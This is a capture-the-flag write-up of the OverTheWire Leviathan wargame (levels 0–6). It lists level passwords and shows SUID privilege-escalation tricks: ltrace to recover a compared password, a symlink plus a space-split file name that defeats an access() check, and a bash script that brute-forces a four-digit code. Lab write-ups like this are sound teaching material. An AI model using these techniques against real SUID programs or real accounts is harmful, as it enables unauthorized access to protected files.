# Leviathan - Over The Wire

> [name=El Famoso]
> [time=Thu, Feb 8, 2024 3:55 AM]

### Leviathan 0

I looked at the file in the `.backup` directory and used `grep` to search `bookmark.html` for the string `leviathan1`.

```bash!
grep 'leviathan1' .backup/bookmark.html
```

![image](https://hackmd.io/_uploads/HyJfbcpia.png)

We got the password for the leviathan1 user: `PPIfmI1qsA`

### Leviathan 1

There is a binary in the home directory called `.check`. It has the SUID bit set and belongs to the leviathan2 account, so it runs with leviathan2's privileges.

![image](https://hackmd.io/_uploads/H1B9m9pip.png)

We check the strings in the binary.

![image](https://hackmd.io/_uploads/B14YQcajT.png)

There are some interesting functions, as we might expect in a password checker: `getchar`, `strcmp`, then `geteuid` and `setreuid`. I tried the password `love` first, but it was not the right one.

I then used `ltrace`, a Linux debugging tool that intercepts and records the dynamic library calls made by a program. Here is the result:

![image](https://hackmd.io/_uploads/BJIGH5aia.png)

We can see that ltrace traced a call to `strcmp` comparing my input with the word `sex`, so we may assume that this is the password.

![image](https://hackmd.io/_uploads/ryptHq6op.png)

We're in. Then `cat /etc/leviathan_pass/leviathan2`: `mEh5PNl10e`

### Leviathan 2

![image](https://hackmd.io/_uploads/HyMBU9poa.png)

This time the executable is called `printfile`.

![image](https://hackmd.io/_uploads/HyV3UqTo6.png)

Nothing really interesting in the strings.

![image](https://hackmd.io/_uploads/B1smdq6oT.png)

So if we create a file, the program displays it.

![image](https://hackmd.io/_uploads/HJx__56s6.png)

![image](https://hackmd.io/_uploads/SyXYtc6sp.png)

Maybe we can try to display the leviathan3 password. But that was not possible: `You cant have access to that file`. After a few tests we see that the C function `access` is called; I did not know what this function does, so I searched a bit.
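As an added example, not part of the original write-up, the following script reproduces locally the `access`-then-`cat` mismatch that the explanation below describes, so it can be run without the Leviathan machine. Everything in it is constructed: `sim_printfile` stands in for the real `printfile`, the deny rule in `sim_access` stands in for the file permission that the real `access()` call enforces (the real binary runs SUID, so `cat` can read what the calling user cannot), and the password file and its content are made up.

```bash
#!/bin/bash
# Added example (not the original write-up's commands): a local simulation of
# the Leviathan 2 printfile check/use mismatch. Nothing here is SUID; the
# privilege boundary is simulated, see sim_access below.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

# Constructed stand-in for /etc/leviathan_pass/leviathan3 (made-up content)
PASSDIR="$WORK/etc/leviathan_pass"
mkdir -p "$PASSDIR"
printf 'fake-leviathan3-password\n' > "$PASSDIR/leviathan3"

# Stand-in for the access() call: evaluated on the whole argument string, as
# one path. The real access() checks the calling user's rights; since the real
# printfile runs SUID, cat can read the password file even though access()
# says the caller may not. That boundary is simulated here by denying
# everything under the password directory.
sim_access() {
    case "$1" in
        "$PASSDIR"/*) return 1 ;;
    esac
    [ -r "$1" ]
}

# Stand-in for printfile: check the whole argument, then run cat on the same
# string *unquoted*, which is what building "/bin/cat %s" with snprintf and
# running it amounts to. The unquoted $1 is the bug being demonstrated.
sim_printfile() {
    if ! sim_access "$1"; then
        echo "You cant have access to that file"
        return 1
    fi
    # shellcheck disable=SC2086
    cat $1
}

# The technique from the write-up: a file we own named "lol.txt oui.txt" is
# one path for the check, but two arguments (lol.txt and oui.txt) for cat.
# lol.txt is a symlink to the password file, so cat prints it.
exploit() {
    local dir
    dir="$(mktemp -d "$WORK/dir.XXXXXX")"
    touch "$dir/lol.txt oui.txt"          # the single file the check sees
    touch "$dir/oui.txt"                  # second cat argument, relative to cwd
    ln -sf "$PASSDIR/leviathan3" "$dir/lol.txt"
    (cd "$dir" && sim_printfile "$dir/lol.txt oui.txt")
}

# A direct request is refused; the name containing a space is not
sim_printfile "$PASSDIR/leviathan3" || true
exploit
```

Run as-is it prints the refusal message for the direct path and then the fake password through the split name; the only thing the real level adds is that `printfile` is SUID, which is why `cat` is allowed to follow the symlink there.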
The `access` function checks whether the calling user may access a given file. Here it is a blocking call to `access` on the path we pass as the argument: it refuses to print the leviathan3 password because we do not have permission on that file. However, the same path is then placed, without any sanitization, into a `cat` command string built with `snprintf`, and `cat` accepts several file arguments. The check and the use do not interpret the argument the same way.

The idea is to create a file we own whose name contains a space, say `lol.txt oui.txt`: for `access` this is a single file, and the check passes. When the command runs, the unquoted name is split, so `cat` receives `lol.txt` and `oui.txt` as two separate files and concatenates them. If one of them, say `lol.txt`, is a symbolic link to `/etc/leviathan_pass/leviathan3` (created with `ln -s`), `cat` prints the password, since `printfile` itself is allowed to read that file. The check on the whole name together with the splitting of the unquoted name is what gives us the leviathan3 password.

![image](https://hackmd.io/_uploads/HyyT2p6ip.png)

### Leviathan 3

![image](https://hackmd.io/_uploads/S1fv3ppja.png)

This level was quite easy; the screenshot explains everything.
![image](https://hackmd.io/_uploads/ByUwa66jT.png)

### Leviathan 4

![image](https://hackmd.io/_uploads/S1GzA6To6.png)

![image](https://hackmd.io/_uploads/H1CyRTaip.png)

### Leviathan 5

![image](https://hackmd.io/_uploads/ry8nZAaj6.png)

### Leviathan 6

```bash=
#!/bin/bash
# Brute force a four-digit code by running the target program with every
# value from 0000 to 9999 as its first argument.

# Check that exactly one argument (the program to brute force) was given
if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <path_to_program>"
    exit 1
fi

# Path to the program to brute force
program="$1"

# Range of possible four-digit codes; the counter is a plain integer and the
# leading zeros are added when the value is formatted
min=0
max=9999

# Loop through all possible codes
for ((i=min; i<=max; i++)); do
    # Pad the code with leading zeros so it is always four digits
    padded_code=$(printf "%04d" "$i")

    # Run the program with the current code as the first argument; the code
    # is also fed on stdin in case the program reads it from there
    output=$(echo "$padded_code" | "$program" "$padded_code")

    # Assumption: the program prints SUCCESS on the right code; adjust this
    # marker to whatever the target actually prints on success
    if [ "$output" == "SUCCESS" ]; then
        echo "Found correct code: $padded_code"
        exit 0
    else
        echo "Attempted code: $padded_code"
    fi
done

echo "Failed to find the correct code."
exit 1
```

`8GpZ5f8Hze`